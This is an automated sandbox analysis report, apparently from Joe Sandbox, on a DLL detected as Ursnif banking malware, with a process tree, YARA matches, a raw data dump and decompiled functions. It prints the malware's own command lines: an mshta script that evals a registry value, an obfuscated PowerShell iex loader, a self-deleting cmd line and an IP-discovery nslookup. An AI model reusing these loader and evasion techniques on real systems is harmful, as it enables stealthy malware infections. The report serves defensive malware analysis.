8f c2 69 d8 28 69 51 46 a7 72 50 9d 2a 97 f7 91 81 7c 6c 5a d0 ba ac bd 1c d8 97 9e 7f 2d 30 0e 8b 0a c6 f9 a4 b5 dc 66 f3 19 b7 79 89 51 9b eb 95 fa e6 32 f7 db 83 04 be d0 a4 34 40 10 7b e0 ea 75 18 6e 32 43 93 ff ec 97 e9 13 de b1 39 90 ae fd b1 88 f6 eb a8 a3 5f d3 40 f2 8a c8 1a b5 da 23 07 28 14 d4 48 91 e4 75 6c 2e 2f 59 14 ed cd 56 33 a4 6f 3c 74 70 51 26 d2 f1 00 9d c7 9e 68 ca 93 01 b0 18 8b 9c 3a 19 27 47 cf c7 cc f2 d1 42 aa e5 ce 1f 0f 07 03 9a 24 72 37 bc 30 c3 42 3d 57 49 09 18 78 26 bc 66 1e 36 de 2a c7 72 0d 10 ee fa 93 05 a5 63 7e 1c e1 d8 c6 71 0e 0f 77 91 6d aa 79 b3 3a 27 fe 2e 3b 53 ad 84 37 f4 45 54 52 da 80 67 3c 9c 44 86 2a a7 58 26 94 83 b1 bd ca d7 ad 1d 43 f8 70 2b 43 d2 05 fd d2 bd 6b 6f 62 28 7b 75 60 c4 14 07 07 2c f7 3e f3 95 1f 56 90 0c 06 3e 6c 02 6c 89 e1 6c 0b cb a0 a3 9c ba 25 72 e8 31 27 75 22 9d 20 f7 46 af 10 5d c0 d6 ec 16 ab 36 03 82 9f fb a2 ca 77 e2 f1 69 ad fe a5 b9 2c 1b 4a e3 1d 69 43 fc 81 b7 22 57 f1 2c fa 72 4d 17 49 56 ad 1f ff 4a a5 38 50 c9 b2 68 b3 c4 e2 33 e0 9b 81 eb 69 56 89 c3 9b 32 9c 57 30 ee 5d 75 8b e2 b2 d7 ee fb a8 48 a0 5e f2 34 a7 15 38 ac ae 28 2c 60 6f 00 b8 12 2b bf 5a 7d fc 9d 1c f0 1a dd a6 92 7f f1 c5 f3 02 e2 83 f6 a1 52 db f7 14 b9 38 35 28 e6 2b 62 1a 3f b8 e0 b5 43 ea a8 92 b6 60 5b 95 b3 d5 09 19 61 54 a7 f6 67 69 2b 6d 9e 93 4e 6a 56 d6 3f 53 09 df 02 18 fe f4 5e 79 48 1e 9b 82 dc cf fb 80 f3 bb 65 a6 56 0e 5a e8 78 a7 13 70 ac ce cc c9 43 75 3c f7 ef 58 23 f8 c7 88 e3 17 85 ca 17 bb 6e 86 b2 4d 6f 8a da 5c 1b 90 9a d2 4d 26 35 99 bb 8b 29 ea 31 7b 6b 5f b9 0e 00 3a a4 e4 ea 72 09 48 da 0c d2 ae 7f 25 91 ec 37 59 6e 37 a1 80 7c 8e 19 d1 1d 3a ee dc 6d 6a 4c 0b 42 b6 2b 61 83 0b d7 d9 f5 f6 ce 72 f7 b5 90 05 e5 3f 8a 59 21 da ac 86 48 37 1f 98 8f 3a 7e a8 72 fb a7 30 f0 f0 02 05 b3 ae ea dd 01 b1 44 fd d2 ee a8 d7 98 54 14 92 eb 8f 4e 62 a3 f2 7e 80 f8 92 9d 71 a2 ed 5c 8a 7c f2 dd 5c 75 7c 65 29 cd 7c e2 5d aa 2d f2 1d f5 f7 ab 93 ec 3b 66 10 48 80 13 8e 53 aa 6d ca d6 5e d2 47 e2 a0 4b fe ca fd 03 fd fa 45 3e c5 74
                                    Data Ascii: @Z $&~N]<M|}9pqE`2]aPe["w~*|/vI-PV~yJe&rc[<YCTeGh a)oV9~.G!6%:6N`IO]%@ dK'[VswoakNsw"H.zsLQ [$h8j5,p{1*"m]|t4~k:\Yg+c$P 0(kQ^i(iQFrP*|lZ-0fyQ24@{un2C9_@#(Hul./YV3o<tpQ&h:'GB$r70B=WIx&f6*rc~qwmy:'.;S7ETRg<D*X&Cp+Ckob({u`,>V>lll%r1'u" F]6wi,JiC"W,rMIVJ8Ph3iV2W0]uH^48(,`o+Z}R85(+b?C`[aTgi+mNjV?S^yHeVZxpCu<X#nMo\M&5)1{k_:rH%7Yn7|:mjLB+ar?Y!H7:~r0DTNb~q\|\u|e)|]-;fHSm^GKE>t


                                    Statistics

                                    CPU Usage

                                    Click to jump to process

                                    Memory Usage

                                    Click to jump to process

                                    High Level Behavior Distribution

                                    Click to dive into process behavior distribution

                                    Behavior

                                    Click to jump to process

                                    System Behavior

                                    General

                                    Target ID:0
                                    Start time:15:26:39
                                    Start date:22/04/2022
                                    Path:C:\Windows\System32\loaddll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:loaddll32.exe "C:\Users\user\Desktop\HxEWwh74qT.dll"
                                    Imagebase:0x950000
                                    File size:116736 bytes
                                    MD5 hash:7DEB5DB86C0AC789123DEC286286B938
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    General

                                    Target ID:2
                                    Start time:15:26:40
                                    Start date:22/04/2022
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\HxEWwh74qT.dll",#1
                                    Imagebase:0xdd0000
                                    File size:232960 bytes
                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    General

                                    Target ID:3
                                    Start time:15:26:40
                                    Start date:22/04/2022
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:rundll32.exe "C:\Users\user\Desktop\HxEWwh74qT.dll",#1
                                    Imagebase:0xd20000
                                    File size:61952 bytes
                                    MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.391081269.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.439315042.00000000052AC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000003.438131198.00000000053AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.491963654.0000000006098000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.436001223.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.438329210.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000003.438206007.0000000005429000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.391236122.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.390852806.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.390783473.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000003.566002484.0000000004C79000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.390963737.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000002.568306199.0000000002E80000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.391015018.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000002.569427566.000000000512F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.390663420.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.391212771.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:high

                                    General

                                    Target ID:6
                                    Start time:15:26:43
                                    Start date:22/04/2022
                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7080 -s 608
                                    Imagebase:0xb30000
                                    File size:434592 bytes
                                    MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    General

                                    Target ID:8
                                    Start time:15:26:48
                                    Start date:22/04/2022
                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7080 -s 604
                                    Imagebase:0x7ff7e8070000
                                    File size:434592 bytes
                                    MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    General

                                    Target ID:12
                                    Start time:15:26:58
                                    Start date:22/04/2022
                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7080 -s 612
                                    Imagebase:0xb30000
                                    File size:434592 bytes
                                    MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    General

                                    Target ID:19
                                    Start time:15:27:24
                                    Start date:22/04/2022
                                    Path:C:\Windows\System32\mshta.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\System32\mshta.exe" "about:<hta:application><script>Lpje='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Lpje).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
                                    Imagebase:0x7ff7dccb0000
                                    File size:14848 bytes
                                    MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    General

                                    Target ID:20
                                    Start time:15:27:26
                                    Start date:22/04/2022
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name wufxrouxe -value gp; new-alias -name atvqcmfj -value iex; atvqcmfj ([System.Text.Encoding]::ASCII.GetString((wufxrouxe "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                                    Imagebase:0x7ff612400000
                                    File size:447488 bytes
                                    MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:.Net C# or VB.NET
                                    Yara matches:
                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000014.00000002.766882377.000002DC00CFC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000014.00000002.766683570.000002DC007F0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000014.00000003.513984044.000002DC00CFC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:high

                                    General

                                    Target ID:21
                                    Start time:15:27:26
                                    Start date:22/04/2022
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7bab80000
                                    File size:625664 bytes
                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language

                                    General

                                    Target ID:24
                                    Start time:15:27:37
                                    Start date:22/04/2022
                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pkbugtxo\pkbugtxo.cmdline
                                    Imagebase:0x7ff748600000
                                    File size:2739304 bytes
                                    MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:.Net C# or VB.NET

                                    General

                                    Target ID:25
                                    Start time:15:27:39
                                    Start date:22/04/2022
                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESD841.tmp" "c:\Users\user\AppData\Local\Temp\pkbugtxo\CSC26C720E9EBC041F086604EECC7DD3CDD.TMP"
                                    Imagebase:0x7ff756520000
                                    File size:47280 bytes
                                    MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language

                                    General

                                    Target ID:27
                                    Start time:15:27:43
                                    Start date:22/04/2022
                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lboh4mlq\lboh4mlq.cmdline
                                    Imagebase:0x7ff748600000
                                    File size:2739304 bytes
                                    MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:.Net C# or VB.NET

                                    General

                                    Target ID:28
                                    Start time:15:27:44
                                    Start date:22/04/2022
                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESED31.tmp" "c:\Users\user\AppData\Local\Temp\lboh4mlq\CSC3DF21D054A9F4C66BF1FA9CD771B1F79.TMP"
                                    Imagebase:0x7ff756520000
                                    File size:47280 bytes
                                    MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language

                                    General

                                    Target ID:29
                                    Start time:15:27:45
                                    Start date:22/04/2022
                                    Path:C:\Windows\System32\control.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\control.exe -h
                                    Imagebase:0x7ff6b9f10000
                                    File size:117760 bytes
                                    MD5 hash:625DAC87CB5D7D44C5CA1DA57898065F
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001D.00000003.518242223.000001BF7E55C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001D.00000003.518050705.000001BF7E55C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000001D.00000000.517494573.0000000000500000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000001D.00000000.515954749.0000000000500000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000001D.00000000.516723035.0000000000500000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security

                                    General

                                    Target ID:33
                                    Start time:15:27:58
                                    Start date:22/04/2022
                                    Path:C:\Windows\explorer.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\Explorer.EXE
                                    Imagebase:0x7ff631f70000
                                    File size:3933184 bytes
                                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language

                                    General

                                    Target ID:37
                                    Start time:15:28:17
                                    Start date:22/04/2022
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\HxEWwh74qT.dll
                                    Imagebase:0x7ff6a6590000
                                    File size:273920 bytes
                                    MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language

                                    General

                                    Target ID:38
                                    Start time:15:28:18
                                    Start date:22/04/2022
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7bab80000
                                    File size:625664 bytes
                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language

                                    General

                                    Target ID:39
                                    Start time:15:28:19
                                    Start date:22/04/2022
                                    Path:C:\Windows\System32\PING.EXE
                                    Wow64 process (32bit):false
                                    Commandline:ping localhost -n 5
                                    Imagebase:0x7ff7ec300000
                                    File size:21504 bytes
                                    MD5 hash:6A7389ECE70FB97BFE9A570DB4ACCC3B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language

                                    General

                                    Target ID:41
                                    Start time:15:28:31
                                    Start date:22/04/2022
                                    Path:C:\Windows\System32\RuntimeBroker.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                    Imagebase:0x7ff669e20000
                                    File size:99272 bytes
                                    MD5 hash:C7E36B4A5D9E6AC600DD7A0E0D52DAC5
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language

                                    General

                                    Target ID:42
                                    Start time:15:29:06
                                    Start date:22/04/2022
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):
                                    Commandline:cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user~1\AppData\Local\Temp\5771.bi1"
                                    Imagebase:
                                    File size:273920 bytes
                                    MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language

                                    Disassembly

                                    Reset < >

                                      Execution Graph

                                      Execution Coverage:19.3%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:0%
                                      Total number of Nodes:6
                                      Total number of Limit Nodes:0
                                      execution_graph 122 401700 GetNLSVersion 123 401731 122->123 124 401750 125 401764 124->125 126 401843 GetBinaryTypeW 125->126 127 40177c 125->127 126->127

                                      Callgraph

                                      Executed Functions

                                      Function 00401750 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 0 401750-401769 call 401078 3 40176b-40178f 0->3 4 40177c-401783 0->4 7 401791-401798 3->7 8 40176d-401778 3->8 6 4018b7-4018c1 4->6 7->6 8->7 9 40177a-40186f GetBinaryTypeW 8->9 13 401871-401878 9->13 14 401883-4018a3 9->14 13->6 15 4018a5-4018ac call 4010a0 14->15 16 40187a-401881 14->16 15->6 16->6
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.403924361.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.403918849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.403939675.000000000042A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.403945219.000000000042D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.403950267.0000000000432000.00000020.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.403955458.0000000000435000.00000020.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.403962294.000000000043E000.00000020.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.403967711.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.403994171.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.403998828.0000000000482000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.404012102.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.404017277.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.404023087.0000000000498000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_loaddll32.jbxd
                                      Similarity
                                      • API ID: BinaryType
                                      • String ID:
                                      • API String ID: 3726996659-0
                                      • Opcode ID: 0d8183f7bc2a03e09b861609ac5344eb6a7f23cfc13e173dd0e82fd06fead202
                                      • Instruction ID: 0eeef9b5ff0b6f189b2643ab8443012d5bbcf05fbf81118edcc849a7d612c21c
                                      • Opcode Fuzzy Hash: 0d8183f7bc2a03e09b861609ac5344eb6a7f23cfc13e173dd0e82fd06fead202
                                      • Instruction Fuzzy Hash: 5F310AB4D043188BDB24DF64C8847ADBBB0AF55304F6081FAD819672E1D3799AC6DB4A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00401700 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 20 401700-40172c GetNLSVersion 21 401731-401736 20->21 22 401747-40174e 21->22 23 401738 21->23 24 40173f-401746 22->24 23->24
                                      C-Code - Quality: 37%
                                      			E00401700() {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr* _t7;
				intOrPtr _t9;
				intOrPtr* _t13;

				_t7 = _t13;
				 *((intOrPtr*)(_t7 + 8)) = 0;
				 *((intOrPtr*)(_t7 + 4)) = 0;
				 *_t7 = 0;
				_t9 =  *__imp__GetNLSVersion(); // executed
				_v12 = _t9;
				if(GetLastError() != 0x57) {
					_v8 = 1;
				} else {
					_v8 = 0;
				}
				return _v8;
			}








                                      0x00401706
                                      0x00401708
                                      0x0040170f
                                      0x00401716
                                      0x00401721
                                      0x0040172c
                                      0x00401736
                                      0x00401747
                                      0x00401738
                                      0x00401738
                                      0x00401738
                                      0x00401746

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.403924361.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.403918849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.403939675.000000000042A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.403945219.000000000042D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.403950267.0000000000432000.00000020.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.403955458.0000000000435000.00000020.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.403962294.000000000043E000.00000020.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.403967711.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.403994171.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.403998828.0000000000482000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.404012102.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.404017277.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.404023087.0000000000498000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_loaddll32.jbxd
                                      Similarity
                                      • API ID: Version
                                      • String ID:
                                      • API String ID: 1889659487-0
                                      • Opcode ID: 0da74c04d799af1ca03a9938062762a246fb5c330307c100066ee08efe424fb3
                                      • Instruction ID: 3cf9f2388d101d325097f471fc7551e32da9b99bb7f36ef05aa09be99d1535a1
                                      • Opcode Fuzzy Hash: 0da74c04d799af1ca03a9938062762a246fb5c330307c100066ee08efe424fb3
                                      • Instruction Fuzzy Hash: 14E04FB0914204DFDB00EFA8D95975E7BF0AB00308F1580F9D8085B3A1D379DE54EB9A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Executed Functions

                                      Function 04DE3072 Relevance: 19.7, APIs: 13, Instructions: 163encryptionCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      C-Code - Quality: 58%
                                      			E04DE3072(int __eax, intOrPtr _a4, int _a8, void* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				int _v8;
				long* _v12;
				int _v16;
				BYTE* _v20;
				long* _v24;
				void* _v39;
				char _v40;
				void _v56;
				int _v60;
				intOrPtr _v64;
				void _v67;
				char _v68;
				void* _t61;
				int _t68;
				signed int _t76;
				int _t79;
				int _t81;
				int _t85;
				long _t86;
				int _t90;
				signed int _t94;
				int _t101;
				BYTE* _t102;
				int _t103;
				void* _t104;
				void* _t105;
				void* _t106;

				_t103 = __eax;
				_t94 = 6;
				_v68 = 0;
				memset( &_v67, 0, _t94 << 2);
				_t105 = _t104 + 0xc;
				asm("stosw");
				asm("stosb");
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				asm("stosb");
				_t61 =  *0x4dea0e8( &_v24, 0, 0, 0x18, 0xf0000000); // executed
				if(_t61 == 0) {
					_a8 = GetLastError();
				} else {
					_t101 = 0x10;
					memcpy( &_v56, _a8, _t101);
					_t106 = _t105 + 0xc;
					_v60 = _t101;
					_v67 = 2;
					_v64 = 0x660e;
					_v68 = 8;
					_t68 = CryptImportKey(_v24,  &_v68, 0x1c, 0, 0,  &_v12); // executed
					if(_t68 == 0) {
						_a8 = GetLastError();
					} else {
						_push(0);
						_push( &_v40);
						_push(1);
						_push(_v12);
						if( *0x4dea0e4() == 0) {
							_a8 = GetLastError();
						} else {
							_t18 = _t103 + 0xf; // 0x11f
							_t76 = _t18 & 0xfffffff0;
							if(_a4 != 0 && _t76 == _t103) {
								_t76 = _t76 + _t101;
							}
							_t102 = E04DE4DF6(_t76);
							_v20 = _t102;
							if(_t102 == 0) {
								_a8 = 8;
							} else {
								_v16 = 0;
								_a8 = 0;
								while(1) {
									_t79 = 0x10;
									_v8 = _t79;
									if(_t103 <= _t79) {
										_v8 = _t103;
									}
									memcpy(_t102, _a12, _v8);
									_t81 = _v8;
									_a12 = _a12 + _t81;
									_t103 = _t103 - _t81;
									_t106 = _t106 + 0xc;
									if(_a4 == 0) {
										_t85 = CryptDecrypt(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8);
									} else {
										_t85 =  *0x4dea0c0(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8, 0x20);
									}
									if(_t85 == 0) {
										break;
									}
									_t90 = _v8;
									_v16 = _v16 + _t90;
									_t102 =  &(_t102[_t90]);
									if(_t103 != 0) {
										continue;
									} else {
										L17:
										 *_a16 = _v20;
										 *_a20 = _v16;
									}
									goto L21;
								}
								_t86 = GetLastError();
								_a8 = _t86;
								if(_t86 != 0) {
									E04DE4C73(_v20);
								} else {
									goto L17;
								}
							}
						}
						L21:
						CryptDestroyKey(_v12);
					}
					CryptReleaseContext(_v24, 0);
				}
				return _a8;
			}






























                                      0x04de307b
                                      0x04de3081
                                      0x04de3084
                                      0x04de308a
                                      0x04de308a
                                      0x04de308c
                                      0x04de308e
                                      0x04de3091
                                      0x04de3097
                                      0x04de3098
                                      0x04de3099
                                      0x04de309f
                                      0x04de30a4
                                      0x04de30aa
                                      0x04de30b2
                                      0x04de320f
                                      0x04de30b8
                                      0x04de30ba
                                      0x04de30c3
                                      0x04de30c8
                                      0x04de30da
                                      0x04de30dd
                                      0x04de30e1
                                      0x04de30e8
                                      0x04de30ec
                                      0x04de30f4
                                      0x04de31fa
                                      0x04de30fa
                                      0x04de30fa
                                      0x04de30fe
                                      0x04de30ff
                                      0x04de3101
